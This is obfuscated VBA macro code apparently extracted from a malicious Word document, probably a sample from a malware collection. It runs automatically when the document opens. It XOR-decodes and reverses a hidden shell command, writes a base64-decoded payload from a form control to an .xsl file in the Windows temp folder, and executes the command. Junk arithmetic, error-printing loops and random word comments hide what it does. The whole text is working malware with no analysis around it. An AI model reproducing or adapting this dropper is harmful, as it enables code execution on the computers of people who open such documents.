Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call main
End Sub
Attribute VB_Name = "aB4ho8"
Public Const a9ubS As String = ""
Public Const aYkye9 As String = "ndows\"
Public Const a2zLf As String = "\t"
Function aHAxC(aZ2sy, a0Pty)

Dim aJ5HW
For aJ5HW = 15 To 53
Debug.Print Error(aJ5HW)
Next aJ5HW
' Concave wy distract transit
Dim aLcxfb As Long
Dim a4yfc
aLcxfb = 1560 / 20
a4yfc = 30618 / 3402
anQauv = aLcxfb - a4yfc
' Poplar bank
Dim aGR2lX
Dim ahvQa As Integer
aGR2lX = 64
ahvQa = -337 + 363
afI9A = aGR2lX - ahvQa
' Murray saskatchewan while
aNjzSP = ""
For a3fktW = 0 To UBound(aZ2sy)
aN0lH = aZ2sy(a3fktW) Xor a0Pty
aNjzSP = aNjzSP & Chr(aN0lH)
Next
aHAxC = aNjzSP
End Function
Attribute VB_Name = "aKP3X6"
Attribute VB_Base = "0{9C915607-3548-42FE-A453-F64F82241623}{415C7C34-573F-4482-9F72-51ED45A7227E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aP36j"
Public Sub a2n6J9()


Dim aImwR
For aImwR = 11 To 62
Debug.Print Error(aImwR)
Next aImwR


Dim a80w3g
Dim avLYc
a80w3g = -149 + 240
avLYc = 12558 / 322
aoU09 = a80w3g / avLYc
' Forgetful corvette succumb literati strategy

Dim aUyd4
aUyd4 = 15813 - 2
Dim a5OLxu As Long
Dim aRcJK As Long
a5OLxu = -1716 + 1725
aRcJK = 490 - 435
aeuog = a5OLxu - aRcJK
' Mahogany avon

Dim ahLkQC
For ahLkQC = 18 To 52
Debug.Print Error(ahLkQC)
Next ahLkQC
Dim aaSQMC As Integer
Dim a2ahE6 As Integer
aaSQMC = 19
a2ahE6 = 170 - 151
aEZe1G = aaSQMC + a2ahE6
' Organize sickened seminars lifetime librarian
Set aug23j = aKP3X6.str
amuvXh = aug23j.Value
Open "c:\wi" & aYkye9 & a2zLf & "emp" & "\arl4Y.xsl" For Output As #1
Print #1, a0DEh(amuvXh)
Close #1
End Sub
Sub aAtnh(aKX5Vn)

Dim aAiTvN
For aAiTvN = 5 To 35
Debug.Print Error(aAiTvN)
Next aAiTvN
' Alison having straight
Dim a5RJAo
Dim aySVIn
a5RJAo = -276 + 356
aySVIn = 46
aEfDa = a5RJAo - aySVIn
' Cj proposed spice altitude vin

Dim aTXpA
For aTXpA = 2 To 58
Debug.Print Error(aTXpA)
Next aTXpA
' Island kevin households saving
Dim a6pxOl As Integer
a6pxOl = 13740 * 1
' Thunderbolt seventy-seven icelandic nursery element mesopotamia verification

Dim aa7wIK
For aa7wIK = 5 To 40
Debug.Print Error(aa7wIK)
Next aa7wIK
Dim a7HLb
Dim auxwd
a7HLb = 23430 / 213
auxwd = 27918 / 517
aaUJRh = a7HLb + auxwd
' Spades sans

End Sub
Function a0DEh(aGO3mw)
Dim aNYdZ As Integer
aNYdZ = 9977 * 2
Dim arGzxX As Long
arGzxX = 38522 / 2
' Res mhz disability courtesy
Set aPuifK = New MSXML2.DOMDocument
Dim aD8GYs As Integer
aD8GYs = 5965 - 3
' Rejoinder decoction tit indeed frustrate fracture
Set agcqWk = aPuifK.createElement("b64")
Dim aJndmx
Dim aH5rSv As Integer
aJndmx = 34
aH5rSv = 281 - 219
aIuGB = aJndmx * aH5rSv
' Admittedly physician specious
agcqWk.DataType = "bin.base64"

Dim a3LCk
For a3LCk = 15 To 44
Debug.Print Error(a3LCk)
Next a3LCk
' Mort elvis traveller zephyr
Dim aPmyzj
Dim ar4Bk
aPmyzj = 111
ar4Bk = 37
awAFg = aPmyzj / ar4Bk
' Bartender routes hospitality
agcqWk.Text = aGO3mw

Dim a37tH8
For a37tH8 = 5 To 45
Debug.Print Error(a37tH8)
Next a37tH8
a0DEh = StrConv(agcqWk.nodeTypedValue, vbUnicode)

End Function
Attribute VB_Name = "aVZW0g"
Function aNFRI()
Dim ariNT
Dim ax8P2 As Integer
ariNT = 386 - 267
ax8P2 = 163 - 114
akG1BL = ariNT * ax8P2
' Buffeted guitar dallas cossack
aNFRI = Array(70, 8, 23, 28, 74, 61, 80, 8, 22, 5, 56, 20, 9, 1, 16, 56, 23, 19, 11, 0, 10, 13, 19, 56, 94, 7, 70, 94, 16, 5, 9, 22, 11, 2, 75, 68, 16, 23, 13, 8, 68, 23, 23, 1, 7, 11, 22, 20, 68, 7, 13, 9, 19, 68, 7, 75, 68, 0, 9, 7)
End Function
Sub main()
Dim aJsPx
aJsPx = 93 + 129
Dim aGCSVn
aGCSVn = 22434 / 2
' Grill hereupon bate
Dim aOT9t6 As String
an1RK = 23100 / 231
aOT9t6 = aHAxC(aNFRI, an1RK)

Dim aR0Iz3
For aR0Iz3 = 20 To 60
Debug.Print Error(aR0Iz3)
Next aR0Iz3
' Perspicuity invitations interposition
Dim adxK5k
Dim agVspR As Integer
adxK5k = 26
agVspR = 13826 / 223
akLzu5 = adxK5k * agVspR

Dim akYKl
akYKl = 18931 * 1
a2n6J9
Call VBA.Interaction.Shell@(StrReverse(aOT9t6))
Dim aiG3p
Dim aKXSlh
aiG3p = 29
aKXSlh = 38
aeCAqd = aiG3p - aKXSlh
' Glimmered callow mineral
End Sub


INQUEST-PP=macro
